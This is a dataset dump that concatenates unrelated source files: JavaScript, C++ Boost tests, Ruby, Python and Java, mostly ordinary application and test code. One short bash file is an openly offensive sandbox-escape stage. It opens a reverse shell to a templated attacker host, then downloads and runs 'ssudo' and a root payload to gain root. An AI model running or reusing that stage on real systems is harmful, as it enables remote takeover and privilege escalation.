text stringlengths 1 1.05M |
|---|
<reponame>ub3rb3457/gray-matter-digital
var fs = require('fs');
function loadCategories()
var dirPath = 'blogs/';
var result = []; //this is going to contain paths
fs.readdir(__dirname + dirPath, function (err, filesPath) {
if (err) throw err;
result = filesPath.map(function (filePath) {
return dirPath + filePath;
});
});
function replaceAll(string, search, replace) {
return string.split(search).join(replace);
}
function dirName(string){
var sub1 = string.replace('-','/')
return sub1.replace('-','')
}
module.exports = function (plop) {
const today = new Date(Date.now())
const shortDate = today.toISOString().split("T")[0]
const file_path = dirName(shortDate)
plop.setHelper("shortDate", () => shortDate),
plop.setHelper("file_path", () => file_path)
plop.setHelper("ISOStringDate", () => today.toISOString()),
// optional welcome message
plop.setWelcomeMessage(
"Welcome to plop! What type of file would you like to generate?"
),
plop.setGenerator("wiki topic",{
description: "Generate a wiki topic",
prompts: [
{
type: "input",
name: "title",
message: "Title of topic:"
}
],
actions: [
{
type: "add",
path: `{{dashCase title}}/README.md`,
templateFile: "plop-templates/blog-post.hbs",
},
]
}),
plop.setGenerator("blog post", {
description: "template for generating blog posts",
prompts: [
{
type: "input",
name: "title",
message: "Title of post:",
},
{
type: "input",
name: "description",
message: "Description of post:",
},
{
type: "list",
name: "category",
message: "Category:",
choices: ["3D Printing", "Programming", "Other"],
filter: function(val) {
return val.toLowerCase()
},
},
],
actions: [
{
type: "add",
path: `blogs/{{dashCase category}}/${file_path}-{{dashCase title}}.md`,
templateFile: "plop-templates/blog-post.hbs",
},
],
})
} |
<reponame>LarsPh/deepscattering-pbrt<filename>src/ext/boost_1_74_0/libs/type_traits/test/is_trivially_copyable_test.cpp
/*
Copyright 2020 <NAME>
(<EMAIL>)
Distributed under the Boost Software License,
Version 1.0. (See accompanying file LICENSE_1_0.txt
or copy at http://www.boost.org/LICENSE_1_0.txt)
*/
#ifdef TEST_STD
#include <type_traits>
#else
#include <boost/type_traits/is_trivially_copyable.hpp>
#endif
#include "test.hpp"
#include "check_integral_constant.hpp"
class private_copy {
public:
private_copy();
private:
private_copy(const private_copy&);
};
class private_assign {
public:
private_assign();
private:
private_assign& operator=(const private_assign&);
};
class private_destruct {
public:
private_destruct();
private:
~private_destruct();
};
#ifndef BOOST_NO_CXX11_DELETED_FUNCTIONS
struct deleted_assign {
deleted_assign();
deleted_assign& operator=(const deleted_assign&) = delete;
};
struct deleted_copy {
deleted_copy() { }
deleted_copy(const deleted_copy&) = delete;
deleted_copy(deleted_copy&&) { }
};
struct deleted_destruct {
deleted_destruct();
~deleted_destruct() = delete;
};
#endif
TT_TEST_BEGIN(is_trivially_copyable)
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long const volatile>::value, false);
#endif
#ifdef BOOST_HAS_LONG_LONG
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type const volatile>::value, false);
#endif
#endif
#ifdef BOOST_HAS_MS_INT64
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8 const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16 const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32 const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64 const volatile>::value, false);
#endif
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<void*>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int*const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<f1>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<f2>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<f3>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mf1>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mf2>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mf3>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mp>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<cmf>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<enum_UDT>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int&>::value, false);
#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int&&>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<const int&>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int[2]>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int[3][2]>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int[2][4][5][6][3]>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<UDT>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<void>::value, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<empty_POD_UDT>::value, true, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<POD_UDT>::value, true, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<POD_union_UDT>::value, true, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<empty_POD_union_UDT>::value, true, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_copy>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_destroy>::value, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_construct>::value, true, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_assign>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_copy> >::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_destroy> >::value, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_construct> >::value, true, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_assign> >::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<test_abc1>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<private_copy>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::has_trivial_assign<private_assign>::value, false);
#ifndef BOOST_NO_CXX11_DELETED_FUNCTIONS
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<deleted_copy>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::has_trivial_assign<deleted_assign>::value, false);
#endif
TT_TEST_END
|
<reponame>racar/catarse4realstate
window.c.AdminDetail = (function(m, _, c){
return {
controller: function(){
},
view: function(ctrl, args){
var actions = args.actions,
item = args.item;
return m('#admin-contribution-detail-box', [
m('.divider.u-margintop-20.u-marginbottom-20'),
m('.w-row.u-marginbottom-30',
_.map(actions, function(action){
return m.component(c[action.component], {data: action.data, item: args.item});
})
),
m('.w-row.card.card-terciary.u-radius',[
m.component(c.AdminTransaction, {contribution: item}),
m.component(c.AdminTransactionHistory, {contribution: item}),
m.component(c.AdminReward, {contribution: item, key: item.key})
])
]);
}
};
}(window.m, window._, window.c));
|
<reponame>despo/apply-for-teacher-training
module ProviderInterface
class DecisionsController < ProviderInterfaceController
before_action :set_application_choice
before_action :requires_make_decisions_permission
def respond
@pick_response_form = PickResponseForm.new
@alternative_study_mode = @application_choice.offered_option.alternative_study_mode
end
def submit_response
@pick_response_form = PickResponseForm.new(decision: params.dig(:provider_interface_pick_response_form, :decision))
if @pick_response_form.valid?
redirect_to @pick_response_form.redirect_attrs
else
render action: :respond
end
end
def new_offer
course_option = if params[:course_option_id]
CourseOption.find(params[:course_option_id])
else
@application_choice.course_option
end
@application_offer = MakeAnOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
course_option: course_option,
)
end
def confirm_offer
course_option = CourseOption.find(params[:course_option_id])
@application_offer = MakeAnOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
course_option: course_option,
standard_conditions: make_an_offer_params[:standard_conditions],
further_conditions: make_an_offer_params.permit(
:further_conditions0,
:further_conditions1,
:further_conditions2,
:further_conditions3,
).to_h,
)
render action: :new_offer if !@application_offer.valid?
end
def create_offer
course_option = CourseOption.find(params[:course_option_id])
@application_offer = MakeAnOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
course_option: course_option,
offer_conditions: params.dig(:offer_conditions),
)
if @application_offer.save
flash[:success] = 'Offer successfully made to candidate'
redirect_to provider_interface_application_choice_path(
application_choice_id: @application_choice.id,
)
else
render action: :new_offer
end
end
def new_withdraw_offer
@withdraw_offer = WithdrawOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
)
end
def confirm_withdraw_offer
@withdraw_offer = WithdrawOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
offer_withdrawal_reason: params.dig(:withdraw_offer, :offer_withdrawal_reason),
)
if !@withdraw_offer.valid?
render action: :new_withdraw_offer
end
end
def withdraw_offer
@withdraw_offer = WithdrawOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
offer_withdrawal_reason: params.dig(:withdraw_offer, :offer_withdrawal_reason),
)
if @withdraw_offer.save
flash[:success] = 'Offer successfully withdrawn'
redirect_to provider_interface_application_choice_feedback_path(
application_choice_id: @application_choice.id,
)
else
render action: :new_withdraw_offer
end
end
def new_defer_offer
@defer_offer = DeferOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
)
end
def defer_offer
DeferOffer.new(
actor: current_provider_user,
application_choice: @application_choice,
).save!
flash[:success] = 'Offer successfully deferred'
redirect_to provider_interface_application_choice_offer_path(@application_choice)
end
private
def make_an_offer_params
params.require(:make_an_offer)
end
end
end
|
#!/bin/bash
echo Executing outside of the sandbox \\o/
# Open a calculator
open /Applications/Calculator.app
# Establish a reverse shell
bash -c "/bin/bash > /dev/tcp/{{ host }}/{{ revshell_port }} <&1 2>&1" &
cd /tmp
# Do the privesc to root (stage4)
curl -s http://{{ host }}:{{ http_port }}/ssudo > ./ssudo
curl -s http://{{ host }}:{{ http_port }}/root_payload.sh > ./root_payload.sh
chmod +x ssudo root_payload.sh
echo "Installed super-sudo (no password required anymore)"
./ssudo ./root_payload.sh
echo We are done here...
|
import React from "react";
import { blockTypes } from "./editorTypes";
import { ToolbarItem, Container } from "./style";
//Rich utils is a utility library for manipulating text (like inlineStyle, blockTypes...)
import { RichUtils, EditorState, AtomicBlockUtils } from "draft-js";
import { isWebUri } from 'valid-url';
export function RenderBlockStyles(props) {
const { editorState, updateEditorState } = props;
const applyStyle = (e, style, label) => {
e.preventDefault();
if(style !== 'atomic'){
return updateEditorState(RichUtils.toggleBlockType(editorState, style));
}else{
return createMedia(label.toLowerCase());
}
};
const createMedia = (label) => {
const promptURL = prompt(`Paste your url of ${label}`);
if (promptURL){
if (isWebUri(promptURL)){
const contentState = editorState.getCurrentContent();
const contentStateWithEntity = contentState.createEntity(
label,
'IMMUTABLE',
{ src: promptURL }
);
const entityKey = contentStateWithEntity.getLastCreatedEntityKey();
const newEditorState = EditorState.set(
editorState,
{ currentContent: contentStateWithEntity }
);
updateEditorState(AtomicBlockUtils.insertAtomicBlock(
newEditorState,
entityKey,
' '
));
}else{
return alert('Your URL is invalid !!')
}
}
}
const isActive = (style) => {
const selection = editorState.getSelection();
const blockType = editorState
.getCurrentContent()
.getBlockForKey(selection.getStartKey())
.getType();
if (style === blockType) return true;
return false;
};
return (
<Container>
{blockTypes.map((item, idx) => {
return (
<ToolbarItem
isActive={isActive(item.style)}
key={`${item.label}-${idx}`}
onClick={(e) => applyStyle(e, item.style, item.label)}
>
{item.icon || item.label}
</ToolbarItem>
);
})}
</Container>
);
} |
/*
Copyright 2021 Adobe. All rights reserved.
This file is licensed to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License. You may obtain a copy
of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
OF ANY KIND, either express or implied. See the License for the specific language
governing permissions and limitations under the License.
*/
const should = require('should');
const { importFile } = require('./testutils');
const FileSystemUploadOptions = importFile('filesystem-upload-options');
const FileSystemUploadItemManager = importFile('filesystem-upload-item-manager');
describe('FileSystemUploadItemManager Tests', function() {
let options;
beforeEach(function() {
options = new FileSystemUploadOptions()
.withUrl('http://someunittestfakeurl/content/dam/target');
});
it('test get directory', async function () {
const manager = new FileSystemUploadItemManager(options, '\\fake\\test\\directory\\');
should(manager.hasDirectory('/fake/test/directory/')).not.be.ok();
should(manager.hasDirectory('/fake/test/directory/child')).not.be.ok();
should(manager.hasDirectory('/fake/test')).not.be.ok();
const subChild = await manager.getDirectory('/fake/test/directory/Child Dir/Sub Child/');
should(subChild).be.ok();
should(subChild.getLocalPath()).be.exactly('/fake/test/directory/Child Dir/Sub Child');
should(subChild.getRemotePath()).be.exactly('/content/dam/target/directory/child-dir/sub-child');
should(subChild.getName()).be.exactly('Sub Child');
should(manager.hasDirectory('/fake/test/directory/')).be.ok();
should(manager.hasDirectory('/fake/test/directory/Child Dir')).be.ok();
should(manager.hasDirectory('/fake/test/directory/Child Dir/Sub Child')).be.ok();
should(manager.hasDirectory('/fake/test')).not.be.ok();
const child = await manager.getDirectory('/fake/test/directory/Child Dir');
should(child).be.ok();
should(child.getLocalPath()).be.exactly('/fake/test/directory/Child Dir');
should(child.getRemotePath()).be.exactly('/content/dam/target/directory/child-dir');
should(child.getName()).be.exactly('Child Dir');
should(manager.getDirectory('/fake/test')).be.rejected();
});
it('test get asset', async function() {
const folderPath = '/fake/asset/directory';
const assetPath = `${folderPath}/Asset #1.jpg`;
const manager = new FileSystemUploadItemManager(options, '/fake/asset/directory');
should(manager.hasAsset(assetPath)).not.be.ok();
const asset = await manager.getAsset(assetPath, 1024);
should(asset).be.ok();
should(asset.getLocalPath()).be.exactly(assetPath);
should(asset.getRemotePath()).be.exactly('/content/dam/target/directory/Asset -1.jpg');
should(asset.getSize()).be.exactly(1024);
should(asset.getParentRemoteUrl()).be.exactly('http://someunittestfakeurl/content/dam/target/directory');
should(manager.hasAsset(assetPath)).be.ok();
should(manager.hasDirectory(folderPath)).be.ok();
});
it('test get root asset', async function() {
const assetPath = '/fake/asset/directory/Asset #1.jpg';
const manager = new FileSystemUploadItemManager(options, assetPath);
should(manager.hasAsset(assetPath)).not.be.ok();
const asset = await manager.getAsset(assetPath, 1024);
should(asset).be.ok();
should(asset.getLocalPath()).be.exactly(assetPath);
should(asset.getRemotePath()).be.exactly('/content/dam/target/Asset -1.jpg');
should(asset.getSize()).be.exactly(1024);
should(asset.getParentRemoteUrl()).be.exactly('http://someunittestfakeurl/content/dam/target');
should(manager.hasAsset(assetPath)).be.ok();
});
});
|
#!/usr/bin/env bash
# Stop script if error occurs
set -e
set -o pipefail
# Notify SkyWay team Slack of the new release
cl_startline=$(cat CHANGELOG.md | grep -nE "^### " | head -n 1 | cut -d ":" -f 1)
cl_finishline=$(($(cat CHANGELOG.md | grep -nE "^## " | head -n 2 | tail -n 1 | cut -d ":" -f 1) - 1))
changelog=`sed -n "${cl_startline},${cl_finishline}p" CHANGELOG.md`;
version_num=`cat package.json | jq -r ".version"`
curl -X POST $NOTIFICATION_ENDOPOINT --data-urlencode 'payload={
"username": "release bot",
"icon_emoji": ":tada:",
"text": "<'"$CIRCLE_BUILD_URL"'|skyway-js-sdk version '"$version_num"' released>\n*Change Log*\n```'"$changelog"'```"
}'
|
def fibonacciSequence(n):
if n == 1:
return 1
elif n == 0:
return 0
else:
return (fibonacciSequence(n - 1) + fibonacciSequence(n - 2))
for n in range(10):
print (fibonacciSequence(n)) |
<gh_stars>0
package com.github.maracas.visitors;
import com.github.maracas.brokenuse.APIUse;
import japicmp.model.JApiCompatibilityChange;
import spoon.SpoonException;
import spoon.reflect.code.CtAssignment;
import spoon.reflect.code.CtExpression;
import spoon.reflect.code.CtInvocation;
import spoon.reflect.code.CtLocalVariable;
import spoon.reflect.declaration.CtMethod;
import spoon.reflect.declaration.CtType;
import spoon.reflect.declaration.CtTypeInformation;
import spoon.reflect.reference.CtExecutableReference;
import spoon.reflect.reference.CtFieldReference;
import spoon.reflect.reference.CtReference;
import spoon.reflect.reference.CtTypeReference;
import java.util.Collection;
import java.util.HashSet;
import java.util.Set;
import java.util.stream.Collectors;
/**
* Visitor in charge of gathering all supertype removed issues in client code.
* <p>
* The visitor detects the following cases:
* <ul>
* <li>Methods overriding methods declared within the supertype. Example:
*
* <pre>
* @Override
* public void m() {
* return;
* }
* </pre>
*
* <li>Accessing supertype fields via subtypes. Example:
*
* <pre>
* AffectedSubtype.field;
* </pre>
*
* <li>Invoking supertype methods via subtypes. Example:
*
* <pre>
* AffectedSubtype.method();
* </pre>
*
* <li>Casting local variables with removed supertype. Example:
*
* <pre>
* RemovedSupertype s = (RemovedSupertype) subtypeObj;
* </pre>
* </ul>
*/
public class SupertypeRemovedVisitor extends BreakingChangeVisitor {
/**
* Spoon reference to the class that removed the supertype(s).
*/
protected final CtTypeReference<?> clsRef;
/**
* Set of removed supertypes of the class (interfaces and classes).
*/
protected final Set<CtTypeReference<?>> supertypes;
/**
* Set of methods defined within the removed supertypes.
*/
protected final Set<CtExecutableReference<?>> superMethods;
/**
* Set of field defined within the removed supertypes.
*/
protected final Set<String> superFields;
/**
* Creates a SupertypeRemovedVisitor instance.
*
* @param clsRef class that removed the supertype(s)
* @param supertypes set of removed supertypes
* @param change kind of breaking change (interface removed or superclass
* removed)
*/
protected SupertypeRemovedVisitor(CtTypeReference<?> clsRef, Set<CtTypeReference<?>> supertypes,
JApiCompatibilityChange change) {
super(change);
this.clsRef = clsRef;
this.supertypes = supertypes;
this.superMethods = supertypes.stream().map(CtTypeInformation::getDeclaredExecutables).flatMap(Collection::stream)
.collect(Collectors.toSet());
this.superFields = supertypes.stream().map(CtTypeInformation::getDeclaredFields).flatMap(Collection::stream)
.map(CtReference::getSimpleName).collect(Collectors.toSet());
}
@Override
public <T> void visitCtFieldReference(CtFieldReference<T> fieldRef) {
if (!superFields.contains(fieldRef.getSimpleName()))
return;
CtTypeReference<?> typeRef = fieldRef.getDeclaringType();
try {
if (typeRef != null && typeRef.isSubtypeOf(clsRef)) {
CtFieldReference<?> declRef = typeRef.getDeclaredField(fieldRef.getSimpleName());
if (declRef == null)
brokenUse(fieldRef, fieldRef, clsRef, APIUse.FIELD_ACCESS);
}
} catch (SpoonException e) {
// FIXME: Find fancier solution. A declaration cannot be resolved
}
}
@Override
public <T> void visitCtInvocation(CtInvocation<T> invocation) {
if (!superMethods.contains(invocation.getExecutable()))
return;
CtTypeReference<?> typeRef = ((CtType<?>) invocation.getParent(CtType.class)).getReference();
try {
if (typeRef.isSubtypeOf(clsRef)) {
brokenUse(invocation, invocation.getExecutable(), clsRef, APIUse.METHOD_INVOCATION);
}
} catch (SpoonException e) {
// FIXME: Find fancier solution. A declaration cannot be resolved
}
// FIXME: cases where a static access is performed via the supertype
// must not be registered as a broken use.
// var target = invocation.getTarget();
// if (methRef.isStatic() && target instanceof CtTypeAccess<?>
// && supertypes.contains(((CtTypeAccess<?>) target).getAccessedType()))
// return;
}
@Override
public <T> void visitCtMethod(CtMethod<T> m) {
if (!superMethods.stream().anyMatch(superM -> superM.getSignature().equals(m.getSignature())))
return;
try {
if (m.getDeclaringType().isSubtypeOf(clsRef)) {
CtExecutableReference<?> superMeth = m.getReference().getOverridingExecutable();
if (superMeth != null && superMethods.contains(superMeth))
